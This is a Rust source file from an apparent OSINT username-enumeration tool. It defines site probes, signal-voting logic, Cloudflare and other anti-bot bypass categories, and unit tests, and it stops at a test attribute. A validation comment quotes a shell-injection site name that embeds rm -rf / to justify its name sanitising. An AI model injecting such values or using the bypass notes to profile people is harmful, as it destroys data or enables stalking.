Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
32/// One site we can probe for the existence of an account.
33#[derive(Debug, Clone, Serialize, Deserialize)]
34pub struct Site {
35    /// Human-readable site name. Doubles as the stable filter key
36    /// (case-insensitive) used by CLI `--only` / `--exclude`.
37    pub name: String,
38    /// URL template containing a `{username}` placeholder.
39    pub url: UrlTemplate,
40    /// Ordered list of detection signals. Aggregated per the type-level docs.
41    /// Optional in source JSON when [`Site::engine`] is set — the engine's
42    /// signals are inherited at load time. After
43    /// [`crate::Registry`] resolution this vec is always non-empty (or the
44    /// site fails `validate`).
45    #[serde(default, skip_serializing_if = "Vec::is_empty")]
46    pub signals: Vec<Signal>,
47    /// One or more usernames known to exist on this site. Consumed by
48    /// `adler doctor` to verify the signal list still reports `Found`
49    /// for a real account. Accepts either a single string or an array
50    /// of strings in JSON; the doctor probes each in declaration order
51    /// and passes the present-check if **any** one of them resolves to
52    /// `Found`. Listing several is defensive — brand accounts or other
53    /// users that the site special-cases (e.g. Instagram's own
54    /// `instagram` account) shouldn't false-fail the whole site.
55    #[serde(default, skip_serializing_if = "Option::is_none")]
56    pub known_present: Option<KnownPresent>,
57    /// Username known to *not* exist on this site (optional). When omitted,
58    /// the doctor generates a random nonsense username instead.
59    #[serde(default, skip_serializing_if = "Option::is_none")]
60    pub known_absent: Option<String>,
61    /// Optional CSS-selector rules for pulling profile fields (name, bio,
62    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
63    #[serde(default, skip_serializing_if = "Vec::is_empty")]
64    pub extract: Vec<Extractor>,
65    /// Free-form classification tags for scanning a subset of the registry,
66    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
67    /// A site with no tags is universal (included unless a `--tag` filter
68    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
69    /// convention, not enforced.
70    #[serde(default, skip_serializing_if = "Vec::is_empty")]
71    pub tags: Vec<String>,
72    /// Extra HTTP headers to send with the probe (e.g.
73    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
74    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
75    /// backends apply them via `Network.setExtraHTTPHeaders` before
76    /// navigation; the raw-HTTP path doesn't read this yet.
77    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
78    pub request_headers: std::collections::BTreeMap<String, String>,
79    /// Optional regular expression describing usernames a site will
80    /// accept. When set and the scanned username doesn't match, the
81    /// site is skipped (the outcome is reported as `Uncertain` with
82    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
83    /// Saves work AND avoids the false-positive class where a site
84    /// 404s on illegal usernames in ways our signal can't tell apart
85    /// from a missing account.
86    ///
87    /// Imported from Sherlock's `regexCheck` field; 95+ sites
88    /// upstream carry one (length bounds, character classes, etc.).
89    /// Validation at load time compiles the regex with `regex::Regex`
90    /// — a malformed pattern rejects the site rather than silently
91    /// degrading at scan time.
92    #[serde(default, skip_serializing_if = "Option::is_none")]
93    pub regex_check: Option<String>,
94    /// Name of a shared [`Engine`] this site inherits from (e.g.
95    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
96    /// thousands of instances with identical detection signatures;
97    /// defining the signature once on an engine and inheriting it
98    /// keeps the registry small and the cost of a platform-wide
99    /// HTML change one fix instead of hundreds.
100    ///
101    /// At registry-load time the engine fields are merged *under* the
102    /// site's own — anything the site declares explicitly (`signals`,
103    /// `request_headers`, `regex_check`) wins on
104    /// conflict; anything left empty / unset is filled from the
105    /// engine. An `engine: "X"` referring to a non-existent X is a
106    /// load-time error.
107    #[serde(default, skip_serializing_if = "Option::is_none")]
108    pub engine: Option<String>,
109    /// Characters the site silently drops from the username server-side
110    /// before matching — `john.doe` and `johndoe` resolve to the same
111    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
112    /// at probe time so the URL we issue matches the canonical form
113    /// the site uses, avoiding a false `NotFound` on a benign
114    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
115    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
116    #[serde(default, skip_serializing_if = "Option::is_none")]
117    pub strip_bad_char: Option<String>,
118    /// HTTP method used to probe this site. Defaults to GET — the vast
119    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
120    /// some Discord/Holopin endpoints) only answer to POST.
121    #[serde(default, skip_serializing_if = "is_default_method")]
122    pub request_method: HttpMethod,
123    /// Request body to send when [`Site::request_method`] is POST. The
124    /// literal `{username}` placeholder is substituted with the probe
125    /// username (same as URL templates). For GraphQL endpoints this
126    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
127    #[serde(default, skip_serializing_if = "Option::is_none")]
128    pub request_body: Option<String>,
129    /// Specific anti-bot mechanisms the site is known to deploy. A
130    /// richer alternative to the flat `bot-protected` tag — knowing
131    /// *which* protection a site uses lets future routing pick the
132    /// right backend (`Cloudflare` → cloudscraper-style bypass,
133    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
134    /// of the all-or-nothing `bot-protected` decision.
135    ///
136    /// Independent of [`Site::tags`]: the existing `bot-protected`
137    /// tag stays as a back-compat shorthand and routes through the
138    /// browser backend exactly as before. When this vector is
139    /// non-empty Adler also treats the site as bot-protected
140    /// regardless of the tag.
141    #[serde(default, skip_serializing_if = "Vec::is_empty")]
142    pub protection: Vec<ProtectionKind>,
143    /// Disable the site without removing it from the registry.
144    /// Disabled sites are skipped by [`crate::Registry::filter`] —
145    /// they don't get probed, don't appear in `--list-sites`, and
146    /// don't count toward the doctor's tally. Useful for parking
147    /// known-broken entries with a reason comment instead of
148    /// deleting them outright, so a future contributor can re-enable
149    /// the entry by flipping the flag once they've authored a
150    /// working signature.
151    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
152    pub disabled: bool,
153    /// Free-form annotation explaining why a [`Site::disabled`] entry
154    /// was parked. The Rust runtime doesn't act on it — the JSON
155    /// loader, scan path and doctor all just look at `disabled` — but
156    /// downstream tooling (`scripts/doctor_aggregate.py`, ad-hoc
157    /// audits) and human maintainers reading `sites.json` directly
158    /// rely on it to tell categories apart at-a-glance:
159    /// `duplicate of <canonical>`, `Honest Limits: …`, `doctor: 3+
160    /// consecutive structural failures`, etc. Optional; only meaningful
161    /// when `disabled` is also `true`.
162    #[serde(default, skip_serializing_if = "Option::is_none")]
163    pub disabled_reason: Option<String>,
164    /// Canonical-source link for mirror-style sites. When a site is
165    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
166    /// `YouTube`), `source` carries the name of the primary site this
167    /// one mirrors. Lets future UX surface "Twitter is offline,
168    /// here's the same account on Nitter" without hand-curated
169    /// linkage. Empty / `None` for canonical sites and sites with
170    /// no known mirror relationship.
171    #[serde(default, skip_serializing_if = "Option::is_none")]
172    pub source: Option<String>,
173    /// Approximate popularity rank — lower numbers are more popular.
174    /// Used by `adler --top N` as a rank ceiling (`popularity <= N`),
175    /// useful for fast checks of high-signal targets. Ranks are curated,
176    /// not derived from traffic data: the seed set covers well-known
177    /// OSINT-relevant sites where most users have accounts. Sites
178    /// without a rank are skipped by `--top N`.
179    #[serde(default, skip_serializing_if = "Option::is_none")]
180    pub popularity: Option<u32>,
181    /// Egress requirement for reaching this site — country and/or IP
182    /// type the probe must exit from (see [`AccessPolicy`]). Default
183    /// (empty) means no special routing: the request uses the client's
184    /// default egress. When constrained and no configured egress fits,
185    /// the probe is reported `Uncertain(GeoUnavailable)` rather than
186    /// fetched from the wrong location.
187    #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
188    pub access: AccessPolicy,
189}
190
191/// A specific anti-bot mechanism a site is known to deploy. Used to
192/// route probes to the right backend (raw HTTP, cloudscraper, full
193/// browser) and to inform users what blocks reliable detection.
194#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
195#[serde(rename_all = "kebab-case")]
196#[non_exhaustive]
197pub enum ProtectionKind {
198    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
199    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
200    /// (e.g. `FlareSolverr`) without a full browser.
201    Cloudflare,
202    /// AWS `CloudFront` edge protection. Often UA-strictness only.
203    Cloudfront,
204    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
205    /// challenge model to Cloudflare.
206    DdosGuard,
207    /// Cloudflare's JS-challenge ("I am under attack" mode).
208    /// Needs a JS-executing backend.
209    CfJsChallenge,
210    /// Cloudflare's WAF firewall blocking by signature, requiring
211    /// a real browser fingerprint to clear.
212    CfFirewall,
213    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
214    /// client by its TLS handshake shape, not its UA).
215    TlsFingerprint,
216    /// `Anubis` proof-of-work challenge. Used by codeberg + a
217    /// growing number of FOSS projects to discourage scraping.
218    Anubis,
219    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
220    /// always blocking — `Uncertain` is the honest answer.
221    Captcha,
222    /// Trivial UA-strictness: rejects unknown User-Agent strings
223    /// but lets through a real-browser UA. Cheapest to bypass.
224    UserAgent,
225    /// Endpoint requires authentication; no anonymous probe path
226    /// exists. Practically unscrapable for OSINT.
227    UserAuth,
228}
229
230/// HTTP method used to probe a site. Only GET and POST are supported.
231#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
232#[serde(rename_all = "UPPERCASE")]
233pub enum HttpMethod {
234    /// Standard GET — the default for ~99% of sites in the registry.
235    #[default]
236    Get,
237    /// POST — for API endpoints that only differentiate accounts via a
238    /// body payload (GraphQL queries, form submissions). Pair with
239    /// [`Site::request_body`].
240    Post,
241}
242
243/// serde's `skip_serializing_if` callback contract requires a
244/// reference, so the by-value lint on a 1-byte type doesn't apply.
245#[allow(clippy::trivially_copy_pass_by_ref)]
246fn is_default_method(m: &HttpMethod) -> bool {
247    matches!(m, HttpMethod::Get)
248}
249
250/// Shared detection signature template for a family of sites that
251/// run the same forum / blog / wiki software (Discourse, vBulletin,
252/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
253///
254/// Engines carry the same kinds of fields as a [`Site`] does (just
255/// the inheritable ones — there's no per-engine `url`, that comes
256/// from the site itself). At registry load, the engine's fields
257/// are merged *under* each referring site's own fields: site wins
258/// on conflict.
259#[derive(Debug, Clone, Default, Serialize, Deserialize)]
260#[non_exhaustive]
261pub struct Engine {
262    /// Default detection signals for sites of this family.
263    /// Inherited only when the site itself declares no `signals`.
264    #[serde(default, skip_serializing_if = "Vec::is_empty")]
265    pub signals: Vec<Signal>,
266    /// Default extra HTTP headers (e.g. a User-Agent that the
267    /// platform accepts where the browser default gets blocked).
268    /// Merged with the site's own headers; site wins per-key.
269    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
270    pub request_headers: std::collections::BTreeMap<String, String>,
271    /// Default username-validity regex inherited only when the site
272    /// itself doesn't declare one.
273    #[serde(default, skip_serializing_if = "Option::is_none")]
274    pub regex_check: Option<String>,
275}
276
277impl Engine {
278    /// Compile-check the engine's own constraints — the inheritable
279    /// fields are subject to the same validation as a site's would
280    /// be.
281    ///
282    /// # Errors
283    /// Returns [`Error::InvalidSite`] when the engine name is
284    /// empty, a signal carries an empty marker, or any other
285    /// constraint a [`Site::validate`] would also flag.
286    pub fn validate(&self, name: &str) -> Result<()> {
287        if name.trim().is_empty() {
288            return Err(Error::InvalidSite {
289                reason: "engine name is empty".into(),
290            });
291        }
292        for signal in &self.signals {
293            signal.validate().map_err(|reason| Error::InvalidSite {
294                reason: format!("engine {name:?}: {reason}"),
295            })?;
296        }
297        if let Some(pat) = &self.regex_check {
298            if let Err(err) = regex::Regex::new(pat) {
299                // The Rust `regex` crate refuses look-around for DoS
300                // reasons; some upstream registries (Sherlock, WMN)
301                // ship patterns that need it. Downgraded from WARN to
302                // DEBUG: it's a known structural limit, the probe
303                // path falls back gracefully, and the noise dominated
304                // CLI startup.
305                tracing::debug!(
306                    engine = %name, pattern = %pat, error = %err,
307                    "engine regex_check did not compile; gate disabled for inheriting sites",
308                );
309            }
310        }
311        Ok(())
312    }
313
314    /// Fill the inheritable empty / unset fields of `site` from
315    /// this engine. Site fields are authoritative: if the site has
316    /// any signals at all, no engine signals are merged in.
317    /// `request_headers` merge per-key (site wins on per-key
318    /// conflict).
319    pub fn merge_into(&self, site: &mut Site) {
320        if site.signals.is_empty() {
321            site.signals.clone_from(&self.signals);
322        }
323        for (k, v) in &self.request_headers {
324            site.request_headers
325                .entry(k.clone())
326                .or_insert_with(|| v.clone());
327        }
328        if site.regex_check.is_none() {
329            site.regex_check.clone_from(&self.regex_check);
330        }
331    }
332}
333
334/// Known-present declaration on a [`Site`].
335///
336/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
337/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
338/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
339/// the site was authored with, so single-username entries stay
340/// compact.
341#[derive(Debug, Clone, Serialize, Deserialize)]
342#[serde(untagged)]
343#[non_exhaustive]
344pub enum KnownPresent {
345    /// Exactly one candidate username.
346    Single(String),
347    /// Two or more candidate usernames. Doctor passes if any resolve
348    /// to `Found`.
349    Multiple(Vec<String>),
350}
351
352impl KnownPresent {
353    /// View all candidate usernames as a slice, in declaration order.
354    /// Always non-empty for `Single`; may be empty for a hand-authored
355    /// `Multiple([])` (validation rejects that).
356    pub fn as_slice(&self) -> &[String] {
357        match self {
358            Self::Single(s) => std::slice::from_ref(s),
359            Self::Multiple(v) => v.as_slice(),
360        }
361    }
362
363    /// Primary candidate — the first declared username. `Single`
364    /// always has one; `Multiple` may be empty if a contributor wrote
365    /// `[]` (caught by [`Site::validate`]).
366    pub fn primary(&self) -> Option<&str> {
367        self.as_slice().first().map(String::as_str)
368    }
369}
370
371impl From<&str> for KnownPresent {
372    fn from(s: &str) -> Self {
373        Self::Single(s.to_owned())
374    }
375}
376
377impl From<String> for KnownPresent {
378    fn from(s: String) -> Self {
379        Self::Single(s)
380    }
381}
382
383/// Upper bound on a site name's length. Names appear in CLI output,
384/// CSV columns, and the validate-sites.yml workflow's run-summary
385/// table — keeping them short avoids both UI breakage and
386/// pathological CI artefacts.
387const NAME_MAX_LEN: usize = 80;
388
389/// True when `name` consists only of characters safe to interpolate
390/// into shell, CSV, and CLI argument contexts. Matches the JSON
391/// Schema pattern `^[\w][\w .()!/+-]*$`.
392fn is_safe_site_name(name: &str) -> bool {
393    let mut chars = name.chars();
394    match chars.next() {
395        Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
396        _ => return false,
397    }
398    chars.all(|c| {
399        c.is_ascii_alphanumeric()
400            || c == '_'
401            || c == ' '
402            || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
403    })
404}
405
406/// A rule for extracting one profile field from a page.
407#[derive(Debug, Clone, Serialize, Deserialize)]
408pub struct Extractor {
409    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
410    pub field: String,
411    /// CSS selector locating the element.
412    pub selector: String,
413    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
414    /// element's trimmed text content is used.
415    #[serde(default, skip_serializing_if = "Option::is_none")]
416    pub attr: Option<String>,
417}
418
419impl Site {
420    /// Render the site URL for a given username.
421    ///
422    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
423    /// those characters are removed from `username` before
424    /// substitution — so a `john.doe` probe against a site that
425    /// lists `strip_bad_char: "."` actually hits the URL for
426    /// `johndoe`, matching the canonical form the site stores
427    /// internally.
428    pub fn url_for(&self, username: &Username) -> String {
429        self.url.substitute(&self.canonical_username(username))
430    }
431
432    /// Render the username in the canonical form this site expects.
433    ///
434    /// This mirrors [`Site::url_for`] without tying callers to URL
435    /// substitution, so detection signals can compare the response body
436    /// against the same username form that was actually probed.
437    pub(crate) fn canonical_username(&self, username: &Username) -> String {
438        let raw = username.as_str();
439        match self.strip_bad_char.as_deref() {
440            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
441                raw.chars().filter(|c| !chars.contains(*c)).collect()
442            }
443            _ => raw.to_owned(),
444        }
445    }
446
447    /// Validate semantic invariants the type system can't enforce
448    /// (empty signals list, empty markers, empty status code sets).
449    pub fn validate(&self) -> Result<()> {
450        if self.name.trim().is_empty() {
451            return Err(Error::InvalidSite {
452                reason: "site name is empty".into(),
453            });
454        }
455        // Site names doubled as shell-interpolation values in the
456        // `validate-sites.yml` PR gate; an unsanitised name like
457        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
458        // quoting and run arbitrary commands on the runner. Both the
459        // JSON Schema and this Rust loader enforce a safe character
460        // class (word chars plus a few visual punctuation marks) at
461        // every entry point.
462        if self.name.len() > NAME_MAX_LEN {
463            return Err(Error::InvalidSite {
464                reason: format!(
465                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
466                    self.name
467                ),
468            });
469        }
470        if !is_safe_site_name(&self.name) {
471            return Err(Error::InvalidSite {
472                reason: format!(
473                    "site name {:?} contains characters outside the allowed \
474                     set (word chars, space, `.()!/+-`)",
475                    self.name
476                ),
477            });
478        }
479        if self.signals.is_empty() {
480            return Err(Error::InvalidSite {
481                reason: format!("site {:?}: signals list is empty", self.name),
482            });
483        }
484        for signal in &self.signals {
485            signal.validate().map_err(|reason| Error::InvalidSite {
486                reason: format!("site {:?}: {reason}", self.name),
487            })?;
488        }
489        for extractor in &self.extract {
490            if extractor.field.trim().is_empty() {
491                return Err(Error::InvalidSite {
492                    reason: format!("site {:?}: extractor has an empty field name", self.name),
493                });
494            }
495            if scraper::Selector::parse(&extractor.selector).is_err() {
496                return Err(Error::InvalidSite {
497                    reason: format!(
498                        "site {:?}: invalid CSS selector {:?} for field {:?}",
499                        self.name, extractor.selector, extractor.field
500                    ),
501                });
502            }
503        }
504        if let Some(pat) = &self.regex_check {
505            if let Err(err) = regex::Regex::new(pat) {
506                // Sherlock's regexes occasionally use lookarounds
507                // (e.g. `(?![.-])`), which the Rust `regex` crate
508                // doesn't support — it's a true regular-language
509                // engine for performance + DoS safety. Rather than
510                // reject the whole site over a username-gate the
511                // probe path will simply skip and let the site keep
512                // working at the cost of one wasted probe per
513                // illegal username. Logged at DEBUG (not WARN) — it's
514                // a known structural limit, ~8 sites in the embedded
515                // registry need look-around. The noise dominated CLI
516                // startup; set `ADLER_LOG=debug` to see them again.
517                tracing::debug!(
518                    site = %self.name, pattern = %pat, error = %err,
519                    "regex_check did not compile; username-gate disabled for this site",
520                );
521            }
522        }
523        if let Some(kp) = &self.known_present {
524            if kp.as_slice().is_empty() {
525                return Err(Error::InvalidSite {
526                    reason: format!("site {:?}: known_present is an empty list", self.name),
527                });
528            }
529            for name in kp.as_slice() {
530                if name.trim().is_empty() {
531                    return Err(Error::InvalidSite {
532                        reason: format!(
533                            "site {:?}: known_present contains an empty username",
534                            self.name
535                        ),
536                    });
537                }
538            }
539        }
540        for tag in &self.tags {
541            if tag.trim().is_empty() {
542                return Err(Error::InvalidSite {
543                    reason: format!("site {:?}: tag is empty", self.name),
544                });
545            }
546        }
547        Ok(())
548    }
549}
550
551/// URL template containing a `{username}` placeholder.
552///
553/// Validated at construction: must contain the placeholder and start with
554/// `http://` or `https://`.
555#[derive(Debug, Clone, PartialEq, Eq)]
556pub struct UrlTemplate(String);
557
558const PLACEHOLDER: &str = "{username}";
559
560impl UrlTemplate {
561    /// Build a template, validating placeholder and scheme.
562    pub fn new(template: impl Into<String>) -> Result<Self> {
563        let t = template.into();
564        if !t.contains(PLACEHOLDER) {
565            return Err(Error::InvalidSite {
566                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
567            });
568        }
569        if !(t.starts_with("http://") || t.starts_with("https://")) {
570            return Err(Error::InvalidSite {
571                reason: format!("url template must start with http(s)://: {t:?}"),
572            });
573        }
574        Ok(Self(t))
575    }
576
577    fn substitute(&self, username: &str) -> String {
578        self.0.replace(PLACEHOLDER, username)
579    }
580
581    /// Borrow the raw template (with placeholder).
582    pub fn as_str(&self) -> &str {
583        &self.0
584    }
585}
586
587impl fmt::Display for UrlTemplate {
588    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
589        f.write_str(&self.0)
590    }
591}
592
593impl Serialize for UrlTemplate {
594    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
595        self.0.serialize(s)
596    }
597}
598
599impl<'de> Deserialize<'de> for UrlTemplate {
600    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
601        let raw = String::deserialize(d)?;
602        Self::new(raw).map_err(serde::de::Error::custom)
603    }
604}
605
606/// A single piece of evidence about whether an account exists.
607///
608/// Signals are tagged in JSON by their `kind`. New variants will land for
609/// Phase 2 length-baseline scoring; the enum is `#[non_exhaustive]` so
610/// adding variants is not a breaking change.
611#[derive(Debug, Clone, Serialize, Deserialize)]
612#[serde(tag = "kind", rename_all = "snake_case")]
613#[non_exhaustive]
614pub enum Signal {
615    /// Votes **`Found`** when the response status is in `codes`.
616    StatusFound {
617        /// Status codes that vote for existence. Must be non-empty.
618        codes: Vec<u16>,
619    },
620    /// Votes **`NotFound`** when the response status is in `codes`.
621    StatusNotFound {
622        /// Status codes that vote for non-existence. Must be non-empty.
623        codes: Vec<u16>,
624    },
625    /// Votes **`Found`** when the response body contains `text`.
626    BodyPresent {
627        /// Substring whose appearance votes for existence. Must be non-empty.
628        text: String,
629    },
630    /// Votes **`Found`** when the response body contains `text` after
631    /// substituting `{username}` with the site's canonical username.
632    BodyUsername {
633        /// Username-confirming body marker. Must be non-empty and must
634        /// contain the literal `{username}` placeholder.
635        text: String,
636    },
637    /// Votes **`NotFound`** when the response body contains `text`.
638    BodyAbsent {
639        /// Substring whose appearance votes for non-existence (e.g.
640        /// `"Profile not found"`). Must be non-empty.
641        text: String,
642    },
643    /// Votes **`NotFound`** when the final URL (post-redirect) contains
644    /// `fragment`.
645    RedirectAbsent {
646        /// Substring that, when present in the final URL, indicates the
647        /// account is missing (typically `"/login"` or `"/404"`). Must be
648        /// non-empty.
649        fragment: String,
650    },
651}
652
653/// Probe data extracted from an HTTP response, fed to each [`Signal`].
654///
655/// Internal detection plumbing — not part of the public API.
656#[derive(Debug)]
657pub(crate) struct Probe<'a> {
658    /// HTTP status code.
659    pub(crate) status: u16,
660    /// Final URL after redirects.
661    pub(crate) final_url: &'a str,
662    /// Decoded response body. Empty string when no body-using signal is configured.
663    pub(crate) body: &'a str,
664    /// Username in the canonical form used for this site.
665    pub(crate) username: &'a str,
666}
667
668/// What one signal concluded after looking at a probe.
669#[derive(Debug, Clone, Copy, PartialEq, Eq)]
670pub(crate) enum SignalVerdict {
671    /// This signal votes that the account exists.
672    Found,
673    /// This signal votes that the account does not exist.
674    NotFound,
675    /// This signal had nothing to say (its trigger condition didn't match).
676    Ambiguous,
677}
678
679impl Signal {
680    /// True if this signal needs to inspect the response body. Used by the
681    /// client to skip body reads when no signal requires them.
682    pub(crate) fn needs_body(&self) -> bool {
683        matches!(
684            self,
685            Self::BodyPresent { .. } | Self::BodyUsername { .. } | Self::BodyAbsent { .. }
686        )
687    }
688
689    /// Evaluate this signal against a probe and produce a vote.
690    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
691        match self {
692            Self::StatusFound { codes } => {
693                if codes.contains(&probe.status) {
694                    SignalVerdict::Found
695                } else {
696                    SignalVerdict::Ambiguous
697                }
698            }
699            Self::StatusNotFound { codes } => {
700                if codes.contains(&probe.status) {
701                    SignalVerdict::NotFound
702                } else {
703                    SignalVerdict::Ambiguous
704                }
705            }
706            Self::BodyPresent { text } => {
707                if probe.body.contains(text.as_str()) {
708                    SignalVerdict::Found
709                } else {
710                    SignalVerdict::Ambiguous
711                }
712            }
713            Self::BodyUsername { text } => {
714                if probe
715                    .body
716                    .contains(render_username_marker(text, probe.username).as_str())
717                {
718                    SignalVerdict::Found
719                } else {
720                    SignalVerdict::Ambiguous
721                }
722            }
723            Self::BodyAbsent { text } => {
724                if probe.body.contains(text.as_str()) {
725                    SignalVerdict::NotFound
726                } else {
727                    SignalVerdict::Ambiguous
728                }
729            }
730            Self::RedirectAbsent { fragment } => {
731                if probe.final_url.contains(fragment.as_str()) {
732                    SignalVerdict::NotFound
733                } else {
734                    SignalVerdict::Ambiguous
735                }
736            }
737        }
738    }
739
740    /// Human-readable description of why this signal fired against `probe`,
741    /// for verdict explainability. Only meaningful for a signal that voted
742    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
743    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
744        match self {
745            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
746            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
747            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
748            Self::BodyUsername { text } => format!(
749                "body contains {:?} (body_username)",
750                render_username_marker(text, probe.username)
751            ),
752            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
753            Self::RedirectAbsent { fragment } => {
754                format!("final URL contains {fragment:?} (redirect_absent)")
755            }
756        }
757    }
758
759    /// Whether this signal confirms the concrete username for the current
760    /// probe instead of only reporting a generic positive match.
761    pub(crate) const fn confirms_username(&self) -> bool {
762        matches!(self, Self::BodyUsername { .. })
763    }
764
765    fn validate(&self) -> std::result::Result<(), String> {
766        match self {
767            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
768                if codes.is_empty() {
769                    return Err("status signal codes list is empty".into());
770                }
771            }
772            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
773                if text.is_empty() {
774                    return Err("body signal text is empty".into());
775                }
776            }
777            Self::BodyUsername { text } => {
778                if text.is_empty() {
779                    return Err("body username signal text is empty".into());
780                }
781                if !text.contains(PLACEHOLDER) {
782                    return Err(format!(
783                        "body username signal text missing {PLACEHOLDER} placeholder"
784                    ));
785                }
786            }
787            Self::RedirectAbsent { fragment } => {
788                if fragment.is_empty() {
789                    return Err("redirect signal fragment is empty".into());
790                }
791            }
792        }
793        Ok(())
794    }
795}
796
797fn render_username_marker(template: &str, username: &str) -> String {
798    template.replace(PLACEHOLDER, username)
799}
800
801/// Aggregate per-signal verdicts into a final [`MatchKind`].
802///
803/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
804/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
805/// docs for why a `NotFound` vote outranks a `Found` vote.
806pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
807where
808    I: IntoIterator<Item = SignalVerdict>,
809{
810    let mut found = false;
811    let mut not_found = false;
812    for v in verdicts {
813        match v {
814            SignalVerdict::Found => found = true,
815            SignalVerdict::NotFound => not_found = true,
816            SignalVerdict::Ambiguous => {}
817        }
818    }
819    if not_found {
820        MatchKind::NotFound
821    } else if found {
822        MatchKind::Found
823    } else {
824        MatchKind::Uncertain
825    }
826}
827
828#[cfg(test)]
829mod tests {
830    use super::*;
831
832    fn site_with(signals: Vec<Signal>) -> Site {
833        Site {
834            name: "Example".into(),
835            url: UrlTemplate::new("https://example.com/{username}").unwrap(),
836            signals,
837            known_present: None,
838            known_absent: None,
839            extract: Vec::new(),
840            tags: Vec::new(),
841            request_headers: std::collections::BTreeMap::new(),
842            regex_check: None,
843            engine: None,
844            strip_bad_char: None,
845            request_method: crate::site::HttpMethod::Get,
846            request_body: None,
847            protection: Vec::new(),
848            disabled: false,
849            disabled_reason: None,
850            source: None,
851            popularity: None,
852            access: crate::AccessPolicy::default(),
853        }
854    }
855
856    #[test]
857    fn url_template_substitutes_placeholder() {
858        let user = Username::new("alice").unwrap();
859        let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
860        assert_eq!(site.url_for(&user), "https://example.com/alice");
861    }
862
863    #[test]
864    fn url_for_strips_bad_chars_before_substitution() {
865        let user = Username::new("john.doe").unwrap();
866        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
867        site.strip_bad_char = Some(".".into());
868        assert_eq!(site.url_for(&user), "https://example.com/johndoe");
869    }
870
871    #[test]
872    fn url_for_strip_bad_char_noop_when_no_match() {
873        let user = Username::new("alice").unwrap();
874        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
875        site.strip_bad_char = Some(".".into());
876        assert_eq!(site.url_for(&user), "https://example.com/alice");
877    }
878
879    #[test]
880    fn canonical_username_matches_url_stripping() {
881        let user = Username::new("john.doe").unwrap();
882        let mut site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
883        site.strip_bad_char = Some(".".into());
884        assert_eq!(site.canonical_username(&user), "johndoe");
885    }
886
887    #[test]
